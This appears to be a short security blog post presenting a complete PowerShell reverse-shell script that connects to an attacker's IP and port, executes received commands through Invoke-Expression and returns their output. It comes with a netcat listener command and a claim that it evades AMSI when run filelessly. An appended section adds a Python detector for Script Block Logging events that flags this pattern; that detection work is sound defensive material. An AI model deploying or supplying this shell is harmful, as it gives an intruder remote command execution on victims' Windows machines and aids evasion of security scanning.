[tool] PowerShell Reverse Shell
KimKwangWoon
2025. 2. 24. 21:01
reverse_shell.ps1
Can also be used fileless (when it is run inside PowerShell, it can execute without AMSI detection)
$LHOST = "0.0.0.0" # attacker's IP
$LPORT = 4444 # port the attacker listens on

# Open the outbound TCP connection and wrap the stream for line-based I/O
$client = New-Object System.Net.Sockets.TCPClient($LHOST, $LPORT)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$reader = New-Object System.IO.StreamReader($stream)
$writer.AutoFlush = $true

# Send a banner so the listener can see that the connection is up
$sendBytes = [System.Text.Encoding]::ASCII.GetBytes("Connected`n")
$stream.Write($sendBytes, 0, $sendBytes.Length)

# Read one command per line, run it, and send back the output or the error message
while ($true) {
    $cmd = $reader.ReadLine()
    if ($cmd -eq "exit") { break }
    $output = try { Invoke-Expression $cmd 2>&1 | Out-String } catch { $_.Exception.Message }
    $writer.WriteLine($output)
}

# Release the streams and the socket
$writer.Close()
$reader.Close()
$stream.Close()
$client.Close()
nc command
nc -lnvp 4444
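From the defender's side, the script above leaves a recognizable combination in PowerShell Script Block Logging (Event ID 4104): a TCPClient, stream I/O on it, and Invoke-Expression in the same script block. The following is an added example, not part of the original post; the event field names (`record_id`, `event_id`, `script_block_text`) and the sample records are constructed assumptions.

```python
import re

# Indicator groups taken from the script on this page; all must co-occur.
INDICATORS = {
    "tcp_client": re.compile(r"(?:System\.)?Net\.Sockets\.TcpClient", re.I),
    "stream_io": re.compile(r"\.GetStream\s*\(|IO\.StreamReader", re.I),
    "dynamic_exec": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
}


def matched_indicators(script_text):
    """Return the sorted names of indicator groups present in the text."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(script_text))


def is_reverse_shell_candidate(script_text):
    """Flag only when socket, stream I/O and dynamic execution co-occur."""
    return len(matched_indicators(script_text)) == len(INDICATORS)


def triage(events):
    """Return (record_id, indicators) for each flagged 4104-style event."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue  # only script block logging records carry script text
        text = ev.get("script_block_text") or ""
        if is_reverse_shell_candidate(text):
            hits.append((ev["record_id"], matched_indicators(text)))
    return hits


# Constructed sample events (not real logs); field names are assumptions.
SAMPLE_EVENTS = [
    {"record_id": 101, "event_id": 4104, "script_block_text":
        "$client = New-Object System.Net.Sockets.TCPClient($LHOST, $LPORT) ... "
        "$stream = $client.GetStream() ... "
        "Invoke-Expression $cmd 2>&1 | Out-String"},
    {"record_id": 102, "event_id": 4104, "script_block_text":
        "$t = New-Object Net.Sockets.TcpClient; $t.Connect('db01', 1433); "
        "$t.Connected"},  # benign port check: socket only, not flagged
    {"record_id": 103, "event_id": 4104, "script_block_text":
        "Invoke-Expression (Get-Content .\\profile-snippet.ps1 -Raw)"},
    {"record_id": 104, "event_id": 4103, "script_block_text": None},
]

if __name__ == "__main__":
    for record_id, names in triage(SAMPLE_EVENTS):
        print(record_id, ",".join(names))
```

Requiring all three groups keeps plain port checks and ordinary Invoke-Expression use out of the results; string matching of this kind does not survive obfuscated script text.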
PoC